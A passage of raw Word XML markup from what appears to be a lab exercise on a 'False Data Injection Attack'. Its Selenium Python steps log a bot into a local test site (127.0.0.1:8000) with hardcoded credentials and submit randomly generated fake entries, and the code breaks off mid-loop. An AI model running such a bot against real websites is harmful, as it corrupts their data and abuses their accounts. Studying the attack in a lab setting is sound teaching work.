        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECB686B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:right="3583" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">False Data Injection Attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C71B845" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="730" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the website as a client </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B72261" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AED20F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="730" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step2: Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ChromeDriverManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the following code </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="7869" w:type="dxa"/>
        <w:tblInd w:w="1411" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="43" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="51" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7869"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F97B52" w14:paraId="28C3FE84" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1968"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7869" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="52BD55BA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:right="1452"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">from selenium.webdriver.common.by import </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>By</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> from selenium import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>webdriver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="448E96F6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>selenium.webdriver</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>.common.keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> import Keys </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D4245C4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="627B4758" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>webdriver_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>manager.chrome</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ChromeDriverManager</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E6CDE53" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2199EA73" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">driver = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>webdriver.Chrome</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ChromeDriverManager</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">().install()) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0207E566" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F82C8F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="730" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the following code, your bot will automatically login to the website and enter false data </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="7869" w:type="dxa"/>
        <w:tblInd w:w="1411" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="38" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7869"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F97B52" w14:paraId="06A63CB7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2834"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7869" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="62D22DC3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">import random </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34326B12" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:right="3008"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> digits = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0] string = '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>abcdefghijklmnopqrstuvwxyz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">' </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D4268E9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
              <w:ind w:right="5550"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>randstring</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">(n): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47BF5E2D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2" w:line="236" w:lineRule="auto"/>
              <w:ind w:right="5065"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">    str1=""     for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(n): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="138CD2A5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="236" w:lineRule="auto"/>
              <w:ind w:right="2159"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">        str1 += (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>random.choice</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">(string))     return str1 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C79C5CE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3273F9E5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00F97B52">
      <w:pPr>
        <w:sectPr w:rsidR="00F97B52">
          <w:headerReference w:type="even" r:id="rId122"/>
          <w:headerReference w:type="default" r:id="rId123"/>
          <w:footerReference w:type="even" r:id="rId124"/>
          <w:footerReference w:type="default" r:id="rId125"/>
          <w:headerReference w:type="first" r:id="rId126"/>
          <w:footerReference w:type="first" r:id="rId127"/>
          <w:pgSz w:w="11911" w:h="16841"/>
          <w:pgMar w:top="1579" w:right="908" w:bottom="1330" w:left="1340" w:header="480" w:footer="478" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26468F9F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00F97B52">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1340" w:right="10587"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10836" w:type="dxa"/>
        <w:tblInd w:w="-801" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="801" w:type="dxa"/>
          <w:bottom w:w="182" w:type="dxa"/>
          <w:right w:w="734" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10836"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F97B52" w14:paraId="0625D7DE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="15766"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10836" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="6" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7C00A0E6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">page = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>driver.get</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>("http://127.0.0.1:8000/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>upload_item</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">") </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F29851A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E3FF80" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2" w:line="236" w:lineRule="auto"/>
              <w:ind w:left="1440"/>
            </w:pP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"username")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63CDAF29" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="236" w:lineRule="auto"/>
              <w:ind w:left="1440"/>
            </w:pP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"username") </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement.send_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">("user1") </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64C593AE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ABF679C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="236" w:lineRule="auto"/>
              <w:ind w:left="1440"/>
            </w:pP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"password")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6BF686A3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
              <w:ind w:left="1440"/>
            </w:pP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"password") </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement.send_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">("sharat123") </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B98198B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4518CCED" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
              <w:ind w:left="1440"/>
            </w:pP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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>By.CSS_SELECTOR</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>, '.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>formbx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> .form </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>form</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> input[type="submit"]').click() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="637A7B6F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="1440" w:right="854"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
